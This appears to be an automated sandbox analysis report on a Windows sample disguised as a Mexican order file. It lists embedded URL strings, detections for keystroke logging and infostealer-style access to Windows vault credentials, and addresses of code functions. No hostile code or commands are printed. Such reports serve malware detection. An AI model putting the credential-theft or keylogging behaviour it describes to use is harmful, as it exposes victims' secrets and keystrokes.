                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
                    Source: chromecache_190.22.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=491668
                    Source: chromecache_190.22.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=649285
                    Source: chromecache_190.22.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
                    Source: vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
                    Source: chromecache_208.22.drString found in binary or memory: https://consultapublicamx.inai.org.mx/vut-web/
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2980414937.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
                    Source: chromecache_208.22.drString found in binary or memory: https://datos.gob.mx/
                    Source: chromecache_190.22.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
                    Source: vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
                    Source: chromecache_190.22.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
                    Source: chromecache_190.22.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
                    Source: vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
                    Source: chromecache_208.22.dr, chromecache_213.22.drString found in binary or memory: https://framework-gb.cdn.gob.mx/
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: https://github.com/Pavich7/P-Browser-Builder-Resource/releases/latest/download/pbb-resource.zip
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: https://github.com/Pavich7/P-Browser-Builder/issues/new/choose
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: https://github.com/Pavich7/P-Browser-Builder/releases/
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#building-a-p-browser-app-f
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#customizing-your-p-browser
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#install-p-browser-builder-
                    Source: chromecache_190.22.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
                    Source: chromecache_190.22.drString found in binary or memory: https://github.com/eslint/eslint/issues/6125
                    Source: chromecache_192.22.drString found in binary or memory: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css
                    Source: chromecache_190.22.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
                    Source: chromecache_190.22.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
                    Source: chromecache_190.22.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
                    Source: chromecache_192.22.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/multipage/infrastructure.html#strip-and-collapse-whitespace
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
                    Source: chromecache_190.22.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
                    Source: chromecache_190.22.drString found in binary or memory: https://jquery.com/
                    Source: chromecache_190.22.drString found in binary or memory: https://jquery.org/license
                    Source: chromecache_190.22.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
                    Source: chromecache_190.22.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
                    Source: vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
                    Source: vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
                    Source: vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
                    Source: chromecache_190.22.drString found in binary or memory: https://promisesaplus.com/#point-48
                    Source: chromecache_190.22.drString found in binary or memory: https://promisesaplus.com/#point-54
                    Source: chromecache_190.22.drString found in binary or memory: https://promisesaplus.com/#point-57
                    Source: chromecache_190.22.drString found in binary or memory: https://promisesaplus.com/#point-59
                    Source: chromecache_190.22.drString found in binary or memory: https://promisesaplus.com/#point-61
                    Source: chromecache_190.22.drString found in binary or memory: https://promisesaplus.com/#point-64
                    Source: chromecache_190.22.drString found in binary or memory: https://promisesaplus.com/#point-75
                    Source: chromecache_208.22.drString found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=17183199&ns_site=
                    Source: chromecache_190.22.drString found in binary or memory: https://sizzlejs.com/
                    Source: vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
                    Source: chromecache_208.22.drString found in binary or memory: https://twitter.com/GobiernoMX
                    Source: chromecache_190.22.drString found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
                    Source: chromecache_190.22.drString found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: chromecache_208.22.drString found in binary or memory: https://www.gob.mx/
                    Source: chromecache_208.22.drString found in binary or memory: https://www.gob.mx/subscribe
                    Source: vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
                    Source: vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: https://www.niklas-menke.de/projekte/smartmeter-auslesen/modbus/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, gmBpn1ecBmQ.cs.Net Code: cTytqmH
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, gmBpn1ecBmQ.cs.Net Code: cTytqmH
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, gmBpn1ecBmQ.cs.Net Code: cTytqmH
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, gmBpn1ecBmQ.cs.Net Code: cTytqmH
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, gmBpn1ecBmQ.cs.Net Code: cTytqmH

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 16.2.vexplorerez.exe.47787c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.vexplorerez.exe.46aceaa.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.vexplorerez.exe.4734a0a.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.vexplorerez.exe.4734a0a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.vexplorerez.exe.46aceaa.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.vexplorerez.exe.3d7cc32.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 24.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.vexplorerez.exe.3e48548.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.vexplorerez.exe.3d7cc32.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.vexplorerez.exe.3e48548.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.vexplorerez.exe.47787c0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.vexplorerez.exe.3e04792.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.vexplorerez.exe.3e04792.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6E348 CreateProcessAsUserW,16_2_08C6E348
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_007651540_2_00765154
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_00BF80D80_2_00BF80D8
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_00BFC7F80_2_00BFC7F8
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_00BF8B180_2_00BF8B18
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_00BFBA800_2_00BFBA80
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_051607A80_2_051607A8
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_05160C900_2_05160C90
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_05160F4D0_2_05160F4D
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_079A79800_2_079A7980
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_079AF1A00_2_079AF1A0
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_079A794D0_2_079A794D
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_079AA1680_2_079AA168
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_081063080_2_08106308
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_081263780_2_08126378
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_08121BE80_2_08121BE8
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_0812636A0_2_0812636A
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_0812038F0_2_0812038F
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_081221D30_2_081221D3
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_081455680_2_08145568
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_08140E110_2_08140E11
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_08140E200_2_08140E20
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_0814554F0_2_0814554F
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_018480D816_2_018480D8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0184C29816_2_0184C298
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0184BF6816_2_0184BF68
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0184C7F816_2_0184C7F8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_06DA07A816_2_06DA07A8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_06DA0F5016_2_06DA0F50
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_06DA0F4316_2_06DA0F43
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0851DAB316_2_0851DAB3
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_085135A816_2_085135A8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0851F6B816_2_0851F6B8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0851EA7816_2_0851EA78
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_085174BD16_2_085174BD
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0851357516_2_08513575
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0851F64F16_2_0851F64F
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0851F60016_2_0851F600
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0880630816_2_08806308
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_088062F816_2_088062F8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0882637816_2_08826378
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_088221E016_2_088221E0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_088203A016_2_088203A0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0884556816_2_08845568
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08840E1016_2_08840E10
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08840E2016_2_08840E20
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C618DC16_2_08C618DC
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6E8E016_2_08C6E8E0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6004016_2_08C60040
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6747016_2_08C67470
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6928116_2_08C69281
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C60A1016_2_08C60A10
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C68BD816_2_08C68BD8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6408816_2_08C64088
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C63C4816_2_08C63C48
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C63C5816_2_08C63C58
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6746016_2_08C67460
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6C87816_2_08C6C878
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6407916_2_08C64079
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6840816_2_08C68408
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6001416_2_08C60014
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C67D9116_2_08C67D91
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C67DA016_2_08C67DA0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6C14816_2_08C6C148
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C636A016_2_08C636A0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C60A0016_2_08C60A00
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C63A1016_2_08C63A10
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C63A2016_2_08C63A20
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C64BC016_2_08C64BC0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C68BC816_2_08C68BC8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C64BD016_2_08C64BD0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C683FA16_2_08C683FA
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6AF8816_2_08C6AF88
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C633A016_2_08C633A0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C627A916_2_08C627A9
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C633B016_2_08C633B0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C627B816_2_08C627B8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6770116_2_08C67701
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08C6771016_2_08C67710
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0E4B004016_2_0E4B0040
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0E4B3F7816_2_0E4B3F78
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0E4B001116_2_0E4B0011
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0E4B34F816_2_0E4B34F8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0884554F16_2_0884554F
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_00CF80D817_2_00CF80D8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_00CFC7F817_2_00CFC7F8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_00CFBF6817_2_00CFBF68
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_00CFBA8017_2_00CFBA80
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_02A1515417_2_02A15154
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_061829B517_2_061829B5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_061807A817_2_061807A8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_06182EF017_2_06182EF0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_06180F5017_2_06180F50
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_06180F4217_2_06180F42
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_06182A1917_2_06182A19
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_061829C417_2_061829C4
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_077E637817_2_077E6378
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_077E636B17_2_077E636B
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_077E038F17_2_077E038F
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0780556817_2_07805568
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07800E1D17_2_07800E1D
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07800E2017_2_07800E20
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A6DAA917_2_07A6DAA9
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A6F6B817_2_07A6F6B8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A635A817_2_07A635A8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A674BD17_2_07A674BD
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A6F6AB17_2_07A6F6AB
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A6EA7817_2_07A6EA78
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A6357517_2_07A63575
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07CD630817_2_07CD6308
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07CD62F817_2_07CD62F8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813004017_2_08130040
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813747017_2_08137470
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_081318E617_2_081318E6
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813EDD017_2_0813EDD0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08138E1017_2_08138E10
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08130A1017_2_08130A10
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813977017_2_08139770
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08138BD817_2_08138BD8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813000617_2_08130006
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813840817_2_08138408
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08133C5817_2_08133C58
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08133C4817_2_08133C48
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813407917_2_08134079
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813B47817_2_0813B478
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813746017_2_08137460
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813408817_2_08134088
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813CD6817_2_0813CD68
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08137D9B17_2_08137D9B
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08137DA017_2_08137DA0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08138DFF17_2_08138DFF
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08133A1017_2_08133A10
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08130A0017_2_08130A00
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813923017_2_08139230
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813C63817_2_0813C638
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08133A2017_2_08133A20
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_081336A017_2_081336A0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0813771017_2_08137710
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_081333B017_2_081333B0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_081327B817_2_081327B8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_081333A017_2_081333A0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_081327A917_2_081327A9
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08134BD017_2_08134BD0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08138BC817_2_08138BC8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_08134BCC17_2_08134BCC
